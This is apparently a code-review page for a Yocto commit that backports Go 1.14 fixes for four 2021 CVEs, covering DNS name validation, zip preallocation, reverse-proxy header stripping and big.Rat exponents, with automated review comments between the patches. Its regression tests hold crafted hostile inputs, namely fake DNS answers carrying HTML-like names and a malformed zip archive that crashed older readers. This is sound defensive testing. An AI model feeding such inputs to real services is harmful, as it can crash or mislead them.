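Review bot: `Upstream-Status` cites github.com/argoheyard/lang-net, while the patched file is vendored from golang.org/x/net, so the fix cannot be checked against its canonical source from this header. I would cite the golang.org/x/net commit instead, `Upstream-Status: Backport [https://github.com/golang/net/commit/<upstream-commit-id>]`, and replace the bare subject `CVE-2021-31525` with the upstream summary line so the log says what the change to `headerValueContainsToken` is for.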
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
new file mode 100644
index 0000000000..3d9de888ff
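--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
@@ -0,0 +1,373 @@
+From 9324d7e53151e9dfa4b25af994a28c2e0b11f729 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Thu, 27 May 2021 10:40:06 -0700
+Subject: [PATCH] net: verify results from Lookup* are valid domain names
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/31d60cda1f58b7558fc5725d2b9e4531655d980e]
+CVE: CVE-2021-33195
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+For the methods LookupCNAME, LookupSRV, LookupMX, LookupNS, and
+LookupAddr check that the returned domain names are in fact valid DNS
+names using the existing isDomainName function.
+
+Thanks to Philipp Jeitner and Haya Shulman from Fraunhofer SIT for
+reporting this issue.
+
+Updates #46241
+Fixes #46356
+Fixes CVE-2021-33195
+
+Change-Id: I47a4f58c031cb752f732e88bbdae7f819f0af4f3
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323131
+Trust: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+(cherry picked from commit cdcd02842da7c004efd023881e3719105209c908)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323269
+---
+ src/net/dnsclient_unix_test.go | 157 +++++++++++++++++++++++++++++++++
+ src/net/lookup.go | 111 ++++++++++++++++++++---
+ 2 files changed, 255 insertions(+), 13 deletions(-)
+
+diff --git a/src/net/dnsclient_unix_test.go b/src/net/dnsclient_unix_test.go
+index 2ad40df..b8617d9 100644
+--- a/src/net/dnsclient_unix_test.go
++++ b/src/net/dnsclient_unix_test.go
+@@ -1800,3 +1800,160 @@ func TestPTRandNonPTR(t *testing.T) {
+ t.Errorf("names = %q; want %q", names, want)
+ }
+ }
++
++func TestCVE202133195(t *testing.T) {
++ fake := fakeDNSServer{
++ rh: func(n, _ string, q dnsmessage.Message, _ time.Time) (dnsmessage.Message, error) {
++ r := dnsmessage.Message{
++ Header: dnsmessage.Header{
++ ID: q.Header.ID,
++ Response: true,
++ RCode: dnsmessage.RCodeSuccess,
++ RecursionAvailable: true,
++ },
++ Questions: q.Questions,
++ }
++ switch q.Questions[0].Type {
++ case dnsmessage.TypeCNAME:
++ r.Answers = []dnsmessage.Resource{}
++ case dnsmessage.TypeA: // CNAME lookup uses a A/AAAA as a proxy
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeA,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.AResource{
++ A: TestAddr,
++ },
++ },
++ )
++ case dnsmessage.TypeSRV:
++ n := q.Questions[0].Name
++ if n.String() == "_hdr._tcp.golang.org." {
++ n = dnsmessage.MustNewName("<html>.golang.org.")
++ }
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: n,
++ Type: dnsmessage.TypeSRV,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.SRVResource{
++ Target: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypeMX:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeMX,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.MXResource{
++ MX: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypeNS:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeNS,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.NSResource{
++ NS: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypePTR:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypePTR,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.PTRResource{
++ PTR: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ }
++ return r, nil
++ },
++ }
++
++ r := Resolver{PreferGo: true, Dial: fake.DialContext}
++ // Change the default resolver to match our manipulated resolver
++ originalDefault := DefaultResolver
++ DefaultResolver = &r
++ defer func() {
++ DefaultResolver = originalDefault
++ }()
++
++ _, err := r.LookupCNAME(context.Background(), "golang.org")
++ if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupCNAME("golang.org")
++ if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, _, err = r.LookupSRV(context.Background(), "target", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, _, err = LookupSRV("target", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, _, err = r.LookupSRV(context.Background(), "hdr", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, _, err = LookupSRV("hdr", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupMX(context.Background(), "golang.org")
++ if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupMX("golang.org")
++ if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupNS(context.Background(), "golang.org")
++ if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupNS("golang.org")
++ if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupAddr(context.Background(), "1.2.3.4")
++ if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupAddr("1.2.3.4")
++ if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++}
+diff --git a/src/net/lookup.go b/src/net/lookup.go
+index 9cebd10..05e88e4 100644
+--- a/src/net/lookup.go
++++ b/src/net/lookup.go
+@@ -364,8 +364,11 @@ func (r *Resolver) LookupPort(ctx context.Context, network, service string) (por
+ // LookupCNAME does not return an error if host does not
+ // contain DNS "CNAME" records, as long as host resolves to
+ // address records.
++//
++// The returned canonical name is validated to be a properly
++// formatted presentation-format domain name.
+ func LookupCNAME(host string) (cname string, err error) {
+- return DefaultResolver.lookupCNAME(context.Background(), host)
++ return DefaultResolver.LookupCNAME(context.Background(), host)
+ }
+
+ // LookupCNAME returns the canonical name for the given host.
+@@ -378,8 +381,18 @@ func LookupCNAME(host string) (cname string, err error) {
+ // LookupCNAME does not return an error if host does not
+ // contain DNS "CNAME" records, as long as host resolves to
+ // address records.
+-func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string, err error) {
+- return r.lookupCNAME(ctx, host)
++//
++// The returned canonical name is validated to be a properly
++// formatted presentation-format domain name.
++func (r *Resolver) LookupCNAME(ctx context.Context, host string) (string, error) {
++ cname, err := r.lookupCNAME(ctx, host)
++ if err != nil {
++ return "", err
++ }
++ if !isDomainName(cname) {
++ return "", &DNSError{Err: "CNAME target is invalid", Name: host}
++ }
++ return cname, nil
+ }
+
+ // LookupSRV tries to resolve an SRV query of the given service,
+@@ -391,8 +404,11 @@ func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string,
+ // That is, it looks up _service._proto.name. To accommodate services
+ // publishing SRV records under non-standard names, if both service
+ // and proto are empty strings, LookupSRV looks up name directly.
++//
++// The returned service names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err error) {
+- return DefaultResolver.lookupSRV(context.Background(), service, proto, name)
++ return DefaultResolver.LookupSRV(context.Background(), service, proto, name)
+ }
+
+ // LookupSRV tries to resolve an SRV query of the given service,
+@@ -404,28 +420,82 @@ func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err err
+ // That is, it looks up _service._proto.name. To accommodate services
+ // publishing SRV records under non-standard names, if both service
+ // and proto are empty strings, LookupSRV looks up name directly.
+-func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (cname string, addrs []*SRV, err error) {
+- return r.lookupSRV(ctx, service, proto, name)
++//
++// The returned service names are validated to be properly
++// formatted presentation-format domain names.
++func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (string, []*SRV, error) {
++ cname, addrs, err := r.lookupSRV(ctx, service, proto, name)
++ if err != nil {
++ return "", nil, err
++ }
++ if cname != "" && !isDomainName(cname) {
++ return "", nil, &DNSError{Err: "SRV header name is invalid", Name: name}
++ }
++ for _, addr := range addrs {
++ if addr == nil {
++ continue
++ }
++ if !isDomainName(addr.Target) {
++ return "", nil, &DNSError{Err: "SRV target is invalid", Name: name}
++ }
++ }
++ return cname, addrs, nil
+ }
+
+ // LookupMX returns the DNS MX records for the given domain name sorted by preference.
++//
++// The returned mail server names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupMX(name string) ([]*MX, error) {
+- return DefaultResolver.lookupMX(context.Background(), name)
++ return DefaultResolver.LookupMX(context.Background(), name)
+ }
+
+ // LookupMX returns the DNS MX records for the given domain name sorted by preference.
++//
++// The returned mail server names are validated to be properly
++// formatted presentation-format domain names.
+ func (r *Resolver) LookupMX(ctx context.Context, name string) ([]*MX, error) {
+- return r.lookupMX(ctx, name)
++ records, err := r.lookupMX(ctx, name)
++ if err != nil {
++ return nil, err
++ }
++ for _, mx := range records {
++ if mx == nil {
++ continue
++ }
++ if !isDomainName(mx.Host) {
++ return nil, &DNSError{Err: "MX target is invalid", Name: name}
++ }
++ }
++ return records, nil
+ }
+
+ // LookupNS returns the DNS NS records for the given domain name.
++//
++// The returned name server names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupNS(name string) ([]*NS, error) {
+- return DefaultResolver.lookupNS(context.Background(), name)
++ return DefaultResolver.LookupNS(context.Background(), name)
+ }
+
+ // LookupNS returns the DNS NS records for the given domain name.
++//
++// The returned name server names are validated to be properly
++// formatted presentation-format domain names.
+ func (r *Resolver) LookupNS(ctx context.Context, name string) ([]*NS, error) {
+- return r.lookupNS(ctx, name)
++ records, err := r.lookupNS(ctx, name)
++ if err != nil {
++ return nil, err
++ }
++ for _, ns := range records {
++ if ns == nil {
++ continue
++ }
++ if !isDomainName(ns.Host) {
++ return nil, &DNSError{Err: "NS target is invalid", Name: name}
++ }
++ }
++ return records, nil
+ }
+
+ // LookupTXT returns the DNS TXT records for the given domain name.
+@@ -441,14 +511,29 @@ func (r *Resolver) LookupTXT(ctx context.Context, name string) ([]string, error)
+ // LookupAddr performs a reverse lookup for the given address, returning a list
+ // of names mapping to that address.
+ //
++// The returned names are validated to be properly formatted presentation-format
++// domain names.
++//
+ // When using the host C library resolver, at most one result will be
+ // returned. To bypass the host resolver, use a custom Resolver.
+ func LookupAddr(addr string) (names []string, err error) {
+- return DefaultResolver.lookupAddr(context.Background(), addr)
++ return DefaultResolver.LookupAddr(context.Background(), addr)
+ }
+
+ // LookupAddr performs a reverse lookup for the given address, returning a list
+ // of names mapping to that address.
+-func (r *Resolver) LookupAddr(ctx context.Context, addr string) (names []string, err error) {
+- return r.lookupAddr(ctx, addr)
++//
++// The returned names are validated to be properly formatted presentation-format
++// domain names.
++func (r *Resolver) LookupAddr(ctx context.Context, addr string) ([]string, error) {
++ names, err := r.lookupAddr(ctx, addr)
++ if err != nil {
++ return nil, err
++ }
++ for _, name := range names {
++ if !isDomainName(name) {
++ return nil, &DNSError{Err: "PTR target is invalid", Name: addr}
++ }
++ }
++ return names, nil
+ }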
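Review bot: In `TestCVE202133195` every check tests `err == nil || err.Error() != expected` and then formats the failure with `err.Error()`, which panics on a nil error in exactly the case where the validation is missing and the lookup succeeds. Pass the error value instead, e.g. `t.Errorf("Resolver.LookupCNAME returned unexpected error, got %v, want %q", err, expected)`, in all twelve checks. Separately, the new doc comments in lookup.go say the names are validated but not that `LookupSRV`, `LookupMX`, `LookupNS` and `LookupAddr` return nil for the whole answer as soon as one record fails `isDomainName`; a sentence such as `// If any returned name is invalid, an error is returned and no records.` would tell callers that one malformed record hides the valid ones.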
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
new file mode 100644
index 0000000000..2e2dc62c49
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
@@ -0,0 +1,124 @@
1From 74242baa4136c7a9132a8ccd9881354442788c8c Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <roland@golang.org>
3Date: Tue, 11 May 2021 11:31:31 -0700
4Subject: [PATCH] archive/zip: only preallocate File slice if reasonably sized
5
6Since the number of files in the EOCD record isn't validated, it isn't
7safe to preallocate Reader.Files using that field. A malformed archive
8can indicate it contains up to 1 << 128 - 1 files. We can still safely
9preallocate the slice by checking if the specified number of files in
10the archive is reasonable, given the size of the archive.
11
12Thanks to the OSS-Fuzz project for discovering this issue and to
13Emmanuel Odeke for reporting it.
14
15Fixes #46242
16Fixes CVE-2021-33196
17
18Change-Id: I3c76d8eec178468b380d87fdb4a3f2cb06f0ee76
19Reviewed-on: https://go-review.googlesource.com/c/go/+/318909
20Trust: Roland Shoemaker <roland@golang.org>
21Trust: Katie Hockman <katie@golang.org>
22Trust: Joe Tsai <thebrokentoaster@gmail.com>
23Run-TryBot: Roland Shoemaker <roland@golang.org>
24TryBot-Result: Go Bot <gobot@golang.org>
25Reviewed-by: Katie Hockman <katie@golang.org>
26Reviewed-by: Joe Tsai <thebrokentoaster@gmail.com>
27
28Upstream-Status: Backport
29CVE: CVE-2021-33196
30Signed-off-by: Armin Kuster <akuster@mvista.com>
31
32---
33 src/archive/zip/reader.go | 10 +++++-
34 src/archive/zip/reader_test.go | 59 ++++++++++++++++++++++++++++++++++
35 2 files changed, 68 insertions(+), 1 deletion(-)
36
37Index: go/src/archive/zip/reader.go
38===================================================================
39--- go.orig/src/archive/zip/reader.go
40+++ go/src/archive/zip/reader.go
41@@ -84,7 +84,15 @@ func (z *Reader) init(r io.ReaderAt, siz
42 return err
43 }
44 z.r = r
45- z.File = make([]*File, 0, end.directoryRecords)
46+ // Since the number of directory records is not validated, it is not
47+ // safe to preallocate z.File without first checking that the specified
48+ // number of files is reasonable, since a malformed archive may
49+ // indicate it contains up to 1 << 128 - 1 files. Since each file has a
50+ // header which will be _at least_ 30 bytes we can safely preallocate
51+ // if (data size / 30) >= end.directoryRecords.
52+ if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
53+ z.File = make([]*File, 0, end.directoryRecords)
54+ }
55 z.Comment = end.comment
56 rs := io.NewSectionReader(r, 0, size)
57 if _, err = rs.Seek(int64(end.directoryOffset), io.SeekStart); err != nil {
58Index: go/src/archive/zip/reader_test.go
59===================================================================
60--- go.orig/src/archive/zip/reader_test.go
61+++ go/src/archive/zip/reader_test.go
62@@ -1070,3 +1070,62 @@ func TestIssue12449(t *testing.T) {
63 t.Errorf("Error reading the archive: %v", err)
64 }
65 }
66+
67+func TestCVE202133196(t *testing.T) {
68+ // Archive that indicates it has 1 << 128 -1 files,
69+ // this would previously cause a panic due to attempting
70+ // to allocate a slice with 1 << 128 -1 elements.
71+ data := []byte{
72+ 0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x08, 0x08,
73+ 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
74+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
75+ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x02,
76+ 0x03, 0x62, 0x61, 0x65, 0x03, 0x04, 0x00, 0x00,
77+ 0xff, 0xff, 0x50, 0x4b, 0x07, 0x08, 0xbe, 0x20,
78+ 0x5c, 0x6c, 0x09, 0x00, 0x00, 0x00, 0x03, 0x00,
79+ 0x00, 0x00, 0x50, 0x4b, 0x01, 0x02, 0x14, 0x00,
80+ 0x14, 0x00, 0x08, 0x08, 0x08, 0x00, 0x00, 0x00,
81+ 0x00, 0x00, 0xbe, 0x20, 0x5c, 0x6c, 0x09, 0x00,
82+ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00,
83+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
84+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
85+ 0x01, 0x02, 0x03, 0x50, 0x4b, 0x06, 0x06, 0x2c,
86+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d,
87+ 0x00, 0x2d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
88+ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
89+ 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff,
90+ 0xff, 0xff, 0xff, 0x31, 0x00, 0x00, 0x00, 0x00,
91+ 0x00, 0x00, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
92+ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x06, 0x07, 0x00,
93+ 0x00, 0x00, 0x00, 0x6b, 0x00, 0x00, 0x00, 0x00,
94+ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x50,
95+ 0x4b, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0xff,
96+ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
97+ 0xff, 0xff, 0xff, 0x00, 0x00,
98+ }
99+ _, err := NewReader(bytes.NewReader(data), int64(len(data)))
100+ if err != ErrFormat {
101+ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
102+ }
103+
104+ // Also check that an archive containing a handful of empty
105+ // files doesn't cause an issue
106+ b := bytes.NewBuffer(nil)
107+ w := NewWriter(b)
108+ for i := 0; i < 5; i++ {
109+ _, err := w.Create("")
110+ if err != nil {
111+ t.Fatalf("Writer.Create failed: %s", err)
112+ }
113+ }
114+ if err := w.Close(); err != nil {
115+ t.Fatalf("Writer.Close failed: %s", err)
116+ }
117+ r, err := NewReader(bytes.NewReader(b.Bytes()), int64(b.Len()))
118+ if err != nil {
119+ t.Fatalf("NewReader failed: %s", err)
120+ }
121+ if len(r.File) != 5 {
122+ t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
123+ }
124+}
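Review bot: The new guard `(uint64(size)-end.directorySize)/30 >= end.directoryRecords` in Reader.init subtracts without first checking that `end.directorySize` is smaller than `size`. Both values come from the archive being parsed, so with this patch alone the uint64 subtraction can wrap and the preallocation check can still pass for a malformed archive. CVE-2021-39293.patch, added later in this same commit, rewrites that line with an `end.directorySize < uint64(size) &&` guard, so the intended protection needs both patches applied, in that order. The SRC_URI change is not visible in this part of the diff; it is worth confirming that it lists CVE-2021-33196.patch before CVE-2021-39293.patch. init's body continues outside the inner hunk.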
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
new file mode 100644
index 0000000000..2052b1d3db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
@@ -0,0 +1,152 @@
1From cbd1ca84453fecf3825a6bb9f985823e8bc32b76 Mon Sep 17 00:00:00 2001
2From: Filippo Valsorda <filippo@golang.org>
3Date: Fri, 21 May 2021 14:02:30 -0400
4Subject: [PATCH] [release-branch.go1.15] net/http/httputil: always remove
5 hop-by-hop headers
6
7Previously, we'd fail to remove the Connection header from a request
8like this:
9
10 Connection:
11 Connection: x-header
12
13Updates #46313
14Fixes #46314
15Fixes CVE-2021-33197
16
17Change-Id: Ie3009e926ceecfa86dfa6bcc6fe14ff01086be7d
18Reviewed-on: https://go-review.googlesource.com/c/go/+/321929
19Run-TryBot: Filippo Valsorda <filippo@golang.org>
20Reviewed-by: Katie Hockman <katie@golang.org>
21Trust: Katie Hockman <katie@golang.org>
22Trust: Filippo Valsorda <filippo@golang.org>
23TryBot-Result: Go Bot <gobot@golang.org>
24Reviewed-on: https://go-review.googlesource.com/c/go/+/323091
25Run-TryBot: Katie Hockman <katie@golang.org>
26
27Upstream-Status: Backport
28CVE: CVE-2021-33197
29Signed-off-by: Armin Kuster <akuster@mvista.com>
30
31---
32 src/net/http/httputil/reverseproxy.go | 22 ++++----
33 src/net/http/httputil/reverseproxy_test.go | 63 +++++++++++++++++++++-
34 2 files changed, 70 insertions(+), 15 deletions(-)
35
36Index: go/src/net/http/httputil/reverseproxy.go
37===================================================================
38--- go.orig/src/net/http/httputil/reverseproxy.go
39+++ go/src/net/http/httputil/reverseproxy.go
40@@ -221,22 +221,18 @@ func (p *ReverseProxy) ServeHTTP(rw http
41 // important is "Connection" because we want a persistent
42 // connection, regardless of what the client sent to us.
43 for _, h := range hopHeaders {
44- hv := outreq.Header.Get(h)
45- if hv == "" {
46- continue
47- }
48- if h == "Te" && hv == "trailers" {
49- // Issue 21096: tell backend applications that
50- // care about trailer support that we support
51- // trailers. (We do, but we don't go out of
52- // our way to advertise that unless the
53- // incoming client request thought it was
54- // worth mentioning)
55- continue
56- }
57 outreq.Header.Del(h)
58 }
59
60+ // Issue 21096: tell backend applications that care about trailer support
61+ // that we support trailers. (We do, but we don't go out of our way to
62+ // advertise that unless the incoming client request thought it was worth
63+ // mentioning.) Note that we look at req.Header, not outreq.Header, since
64+ // the latter has passed through removeConnectionHeaders.
65+ if httpguts.HeaderValuesContainsToken(req.Header["Te"], "trailers") {
66+ outreq.Header.Set("Te", "trailers")
67+ }
68+
69 // After stripping all the hop-by-hop connection headers above, add back any
70 // necessary for protocol upgrades, such as for websockets.
71 if reqUpType != "" {
72Index: go/src/net/http/httputil/reverseproxy_test.go
73===================================================================
74--- go.orig/src/net/http/httputil/reverseproxy_test.go
75+++ go/src/net/http/httputil/reverseproxy_test.go
76@@ -91,8 +91,9 @@ func TestReverseProxy(t *testing.T) {
77
78 getReq, _ := http.NewRequest("GET", frontend.URL, nil)
79 getReq.Host = "some-name"
80- getReq.Header.Set("Connection", "close")
81- getReq.Header.Set("Te", "trailers")
82+ getReq.Header.Set("Connection", "close, TE")
83+ getReq.Header.Add("Te", "foo")
84+ getReq.Header.Add("Te", "bar, trailers")
85 getReq.Header.Set("Proxy-Connection", "should be deleted")
86 getReq.Header.Set("Upgrade", "foo")
87 getReq.Close = true
88@@ -236,6 +237,64 @@ func TestReverseProxyStripHeadersPresent
89 }
90 }
91
92+func TestReverseProxyStripEmptyConnection(t *testing.T) {
93+ // See Issue 46313.
94+ const backendResponse = "I am the backend"
95+
96+ // someConnHeader is some arbitrary header to be declared as a hop-by-hop header
97+ // in the Request's Connection header.
98+ const someConnHeader = "X-Some-Conn-Header"
99+
100+ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
101+ if c := r.Header.Values("Connection"); len(c) != 0 {
102+ t.Errorf("handler got header %q = %v; want empty", "Connection", c)
103+ }
104+ if c := r.Header.Get(someConnHeader); c != "" {
105+ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
106+ }
107+ w.Header().Add("Connection", "")
108+ w.Header().Add("Connection", someConnHeader)
109+ w.Header().Set(someConnHeader, "should be deleted")
110+ io.WriteString(w, backendResponse)
111+ }))
112+ defer backend.Close()
113+ backendURL, err := url.Parse(backend.URL)
114+ if err != nil {
115+ t.Fatal(err)
116+ }
117+ proxyHandler := NewSingleHostReverseProxy(backendURL)
118+ frontend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
119+ proxyHandler.ServeHTTP(w, r)
120+ if c := r.Header.Get(someConnHeader); c != "should be deleted" {
121+ t.Errorf("handler modified header %q = %q; want %q", someConnHeader, c, "should be deleted")
122+ }
123+ }))
124+ defer frontend.Close()
125+
126+ getReq, _ := http.NewRequest("GET", frontend.URL, nil)
127+ getReq.Header.Add("Connection", "")
128+ getReq.Header.Add("Connection", someConnHeader)
129+ getReq.Header.Set(someConnHeader, "should be deleted")
130+ res, err := frontend.Client().Do(getReq)
131+ if err != nil {
132+ t.Fatalf("Get: %v", err)
133+ }
134+ defer res.Body.Close()
135+ bodyBytes, err := ioutil.ReadAll(res.Body)
136+ if err != nil {
137+ t.Fatalf("reading body: %v", err)
138+ }
139+ if got, want := string(bodyBytes), backendResponse; got != want {
140+ t.Errorf("got body %q; want %q", got, want)
141+ }
142+ if c := res.Header.Get("Connection"); c != "" {
143+ t.Errorf("handler got header %q = %q; want empty", "Connection", c)
144+ }
145+ if c := res.Header.Get(someConnHeader); c != "" {
146+ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
147+ }
148+}
149+
150 func TestXForwardedFor(t *testing.T) {
151 const prevForwardedFor = "client ip"
152 const backendResponse = "I am the backend"
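Review bot: The `Upstream-Status: Backport` line in this patch header gives no reference to the upstream commit, and CVE-2021-33196.patch in this commit has the same gap. The subject is also tagged `[release-branch.go1.15]` although the patch lands in the go-1.14 recipe directory. Several other patches here record the commit URL, which lets an auditor compare a security backport against its source. If the hash on the `From` line is the upstream commit (not confirmed from this page), the header could read `Upstream-Status: Backport [https://github.com/golang/go/commit/cbd1ca84453fecf3825a6bb9f985823e8bc32b76]`.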
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
new file mode 100644
index 0000000000..241c08dad7
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
@@ -0,0 +1,113 @@
1From c8866491ac424cdf39aedb325e6dec9e54418cfb Mon Sep 17 00:00:00 2001
2From: Robert Griesemer <gri@golang.org>
3Date: Sun, 2 May 2021 11:27:03 -0700
4Subject: [PATCH] math/big: check for excessive exponents in Rat.SetString
5
6CVE-2021-33198
7
8Upstream-Status: Backport [https://github.com/golang/go/commit/df9ce19db6df32d94eae8760927bdfbc595433c3]
9CVE: CVE-2021-33198
10Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
11
12
13Found by OSS-Fuzz https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33284
14
15Thanks to Emmanuel Odeke for reporting this issue.
16
17Updates #45910
18Fixes #46305
19Fixes CVE-2021-33198
20
21Change-Id: I61e7b04dbd80343420b57eede439e361c0f7b79c
22Reviewed-on: https://go-review.googlesource.com/c/go/+/316149
23Trust: Robert Griesemer <gri@golang.org>
24Trust: Katie Hockman <katie@golang.org>
25Run-TryBot: Robert Griesemer <gri@golang.org>
26TryBot-Result: Go Bot <gobot@golang.org>
27Reviewed-by: Katie Hockman <katie@golang.org>
28Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
29(cherry picked from commit 6c591f79b0b5327549bd4e94970f7a279efb4ab0)
30Reviewed-on: https://go-review.googlesource.com/c/go/+/321831
31Run-TryBot: Katie Hockman <katie@golang.org>
32Reviewed-by: Roland Shoemaker <roland@golang.org>
33---
34 src/math/big/ratconv.go | 15 ++++++++-------
35 src/math/big/ratconv_test.go | 25 +++++++++++++++++++++++++
36 2 files changed, 33 insertions(+), 7 deletions(-)
37
38diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
39index e8cbdbe..90053a9 100644
40--- a/src/math/big/ratconv.go
41+++ b/src/math/big/ratconv.go
42@@ -51,7 +51,8 @@ func (z *Rat) Scan(s fmt.ScanState, ch rune) error {
